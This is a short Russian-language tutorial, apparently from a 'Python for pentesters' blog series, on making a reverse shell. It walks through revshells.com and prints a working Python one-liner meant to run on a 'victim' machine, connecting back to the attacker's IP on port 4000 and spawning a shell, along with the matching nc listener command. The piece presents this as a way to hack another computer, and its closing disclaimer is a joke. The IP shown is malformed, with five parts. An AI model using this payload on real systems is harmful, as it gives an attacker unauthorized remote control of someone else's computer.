#5 Python для пентестера. Reverse Shell

Введение:

E7 | TEAM

В этой статье мы создадим свой Reverse Shell для управления целевым компьютером с помощью Python!

Для чего это нужно?

Как мы уже раньше разбирали, обратное подключение позволяет атакующему компьютеру управлять жертвой без надобности подключения к ней, вместо этого жертва подключается к нашему компьютеру и получает команды.

Основное:

Чтобы каждый раз не писать Reverse Shell для определенного компьютера, существуют готовые пейлоады на разных языках и в разных контекстах. Существуют и целые генераторы, один из самых популярных - https://www.revshells.com/

Зайдя на страницу мы можем увидеть множество полей, но пугаться не стоит:

В поле IP мы введем адресс нашего компьютера, узнать его можно на 2ip.ru

В поле порта мы введем удобный для нас порт для подключения, пусть это будет 4000

Теперь в нижнем углу выберем вариант "Python #1" и сгенерируем наш пэйлоад!

Нам выдаст следующую команду:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("94.43.65.1.22",4000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

Она предназначена для жертвы.

В верхнем углу находится 2 команда:

nc -lvnp 4000

Она предназначена для управляющего компьютера, то есть для нашего.

Запускаем обе команды на разных компьютерах и получаем удаленный доступ!

У многих возникнет вопрос, но почему Python? Все просто, Python это кросс-платформенный язык который есть на самых различных компьютерах с разными ОС, а значит он может пригодиться в качестве языка для взлома.

Вывод:

Python является разносторонним языком и позволяет написать самые разные инструменты, в данной статье мы увидели еще одно применение ему. Что касается написания пэйлоадов, мы научились в несколько кликов генерировать команды для взлома стороннего компьютера!

Внимание! Вся информация строго в ознакомительно-познавательных целях. Автор данной статьи, а также ресурс на котором он размещает данную статью, не несут ответственности за любые последствия от ее прочтения, а также за ваше плохое самочувствие, детей - двоечников и долги по ипотеке.